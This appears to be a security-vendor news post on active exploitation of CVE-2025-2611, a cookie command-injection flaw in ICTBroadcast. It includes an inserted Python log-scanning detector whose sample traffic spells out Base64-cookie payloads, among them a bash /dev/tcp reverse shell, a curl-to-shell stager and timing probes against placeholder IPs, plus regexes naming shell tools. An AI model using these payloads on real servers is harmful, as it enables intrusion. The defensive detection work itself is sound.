
Critical Cookie Vulnerability in ICTBroadcast Exploited for Remote Shell Access

Updated: 22 hours ago

Security researchers have revealed that a severe flaw in ICTBroadcast, an autodialer product from ICT Innovations, is being actively exploited. The vulnerability lets unauthenticated attackers achieve remote code execution and use it to open reverse shells on exposed servers. It affects specific versions of the software (7.4 and earlier), and the first exploitation attempts were observed on October 11th.


Key Takeaways

  • A critical vulnerability (CVE-2025-2611) in ICTBroadcast allows unauthenticated remote code execution.

  • Attackers exploit the vulnerability by injecting shell commands into the BROADCAST session cookie.

  • The flaw affects ICTBroadcast versions 7.4 and below.

  • In-the-wild exploitation involves a two-phase approach: exploit check and reverse shell establishment.

  • Overlap with previously identified malicious activity suggests potential reuse of tools or shared infrastructure.

The Vulnerability Explained

The flaw, tracked as CVE-2025-2611 with a CVSS score of 9.3 (critical), stems from improper input validation in ICTBroadcast. The application trusts the contents of the BROADCAST session cookie: the value it receives from the client is decoded and used in an operating system command without being sanitized, so an attacker who places shell commands in that cookie gets them executed on the server. Because the cookie is processed before any login, no valid account or session is needed, which is what makes the issue unauthenticated remote code execution.

Exploitation in the Wild

Security firm VulnCheck observed active exploitation of this vulnerability starting on October 11th. The attacks follow a two-stage process. First, the attacker sends a crafted HTTP request whose BROADCAST cookie carries a Base64-encoded command such as "sleep 3". This is a timing probe: a response delayed by roughly three seconds tells the attacker that the injected command ran, without leaving any output on the page. Once execution is confirmed, a second request delivers a payload that opens a reverse shell from the compromised server back to attacker-controlled infrastructure.
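The two passages above describe the vulnerability (untrusted BROADCAST cookie contents reaching a shell) and the in-the-wild pattern (a Base64-encoded "sleep" probe followed by a reverse shell). The following Python is an added example written for this page, not code from the article, VulnCheck or ICT Innovations: it scans access-log lines for the BROADCAST cookie, Base64-decodes it and classifies what it finds, then reports source IPs that show the probe-then-shell sequence. The log format, the sample requests, the IP addresses and the assumed layout of a benign cookie are all constructed for the example; the exploit path and the real cookie format are not stated on the page, so the generic injection rule is a heuristic that must be tuned against legitimate traffic before it is used for blocking.

```python
"""Detect CVE-2025-2611-style exploitation attempts in web server logs.

Added example, not part of the original article or the vendor's code.
Log format, sample traffic, IPs and the benign cookie layout are constructed.
"""
import base64
import binascii
import re
from dataclasses import dataclass

# Constructed log format: "<ip> - [<ts>] \"<request>\" <status> \"<Cookie header>\"".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) "(?P<cookie>[^"]*)"$'
)

# Stage 2 indicators: reverse-shell and download-and-run idioms.
REVERSE_SHELL = re.compile(
    r"/dev/tcp/|\bnc\b.*\s-e\b|\bbash\s+-i\b|\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b|\bsocket\.socket\b"
)
# Stage 1 indicator: a timing probe such as "sleep 3" (the article's example).
TIMING_PROBE = re.compile(r"\bsleep\s+\d+")
# Generic OS command injection: a shell separator followed by a command word.
# Heuristic (assumption): tune against the real benign cookie format before blocking.
INJECTION = re.compile(r"(?:[;&|`\n]|\$\()\s*[A-Za-z_./][\w./-]*(?=\s|$)")


@dataclass(frozen=True)
class Finding:
    src_ip: str
    stage: str      # "probe", "reverse_shell" or "injection"
    decoded: str    # cookie contents after Base64 decoding


def extract_broadcast(cookie_header: str):
    """Return the raw BROADCAST value from a Cookie header, or None."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "BROADCAST":
            return value
    return None


def decode_broadcast(value: str):
    """Base64-decode a cookie value, tolerating URL-encoded or missing padding."""
    value = value.replace("%3D", "=").replace("%3d", "=")
    try:
        raw = base64.b64decode(value + "=" * (-len(value) % 4))
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", errors="replace")


def classify(decoded: str):
    """Most specific matching stage, or None when nothing looks like injection."""
    if REVERSE_SHELL.search(decoded):
        return "reverse_shell"
    if TIMING_PROBE.search(decoded):
        return "probe"
    if INJECTION.search(decoded):
        return "injection"
    return None


def scan(lines):
    """Parse log lines in order and return a Finding for each suspicious cookie."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        value = extract_broadcast(m["cookie"])
        decoded = decode_broadcast(value) if value is not None else None
        stage = classify(decoded) if decoded is not None else None
        if stage:
            findings.append(Finding(m["ip"], stage, decoded))
    return findings


def two_phase_actors(findings):
    """Source IPs that sent a timing probe and later a reverse shell, in that order."""
    probed, actors = set(), []
    for f in findings:
        if f.stage == "probe":
            probed.add(f.src_ip)
        elif f.stage == "reverse_shell" and f.src_ip in probed and f.src_ip not in actors:
            actors.append(f.src_ip)
    return actors


def _cookie(payload: str) -> str:
    """Base64-encode a BROADCAST value the way the article says attackers do."""
    return base64.b64encode(payload.encode()).decode()


def _line(ip: str, ts: str, cookie: str) -> str:
    return f'{ip} - [{ts}] "GET / HTTP/1.1" 200 "{cookie}"'


# Constructed sample traffic: one benign session, one two-phase attacker,
# one direct stager, one generic injection and one request without the cookie.
SAMPLE_LINES = [
    _line("203.0.113.7", "11/Oct/2025:04:12:09 +0000",
          "BROADCAST=" + _cookie('a:1:{s:7:"user_id";i:42;}')),   # assumed benign layout
    _line("198.51.100.42", "11/Oct/2025:04:15:01 +0000", "BROADCAST=" + _cookie("'; sleep 3 #")),
    _line("198.51.100.42", "11/Oct/2025:04:15:09 +0000",
          "BROADCAST=" + _cookie("; bash -i >& /dev/tcp/198.51.100.23/4444 0>&1 #")),
    _line("203.0.113.77", "11/Oct/2025:05:02:44 +0000",
          "BROADCAST=" + _cookie("; curl http://198.51.100.23/x.sh | sh")),
    _line("203.0.113.9", "11/Oct/2025:05:10:00 +0000", "BROADCAST=" + _cookie("; id #")),
    _line("203.0.113.7", "11/Oct/2025:05:11:30 +0000", "PHPSESSID=abc123"),
]

if __name__ == "__main__":
    results = scan(SAMPLE_LINES)
    for f in results:
        print(f"{f.src_ip:15} {f.stage:13} {f.decoded!r}")
    print("two-phase actors:", two_phase_actors(results))
```

The probe is matched before the generic rule so that "sleep 3" is reported as stage one rather than as an anonymous injection; the reverse-shell patterns win over both. Running the same classifier at a reverse proxy to reject requests whose decoded cookie trips any rule is a reasonable stopgap while no vendor patch exists, but only after the generic rule has been checked against real BROADCAST values, since a legitimate serialized cookie also contains separators such as ";".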

Attacker Tactics and Infrastructure

During their analysis, researchers noted the use of a URL in the payload for establishing reverse shells, along with connections to the IP address . These indicators have previously been associated with a Java-based remote access trojan (RAT) named Ratty RAT, which was distributed through an email campaign targeting organizations in Spain, Italy, and Portugal. This overlap suggests that the threat actors exploiting ICTBroadcast may be reusing tools or sharing infrastructure with other malicious operations.

Affected Versions and Mitigation

The vulnerability affects ICTBroadcast versions 7.4 and earlier. At the time of reporting, no patch or update from ICT Innovations was available. Organizations running affected versions should contact the vendor for guidance and, in the meantime, limit who can reach the ICTBroadcast web interface, watch for requests whose BROADCAST cookie decodes to shell commands, and alert on unexpected outbound connections from the ICTBroadcast host, since a successful attack ends with the server calling back to attacker infrastructure.

As cyber threats become increasingly sophisticated, your security strategy must evolve to keep pace. BetterWorld Technology offers adaptive cybersecurity solutions that grow with the threat landscape, helping your business stay secure while continuing to innovate. Reach out today to schedule your personalized consultation.

Source

  • Hackers Target ICTBroadcast Servers via Cookie Exploit to Gain Remote Shell Access, The Hacker News.
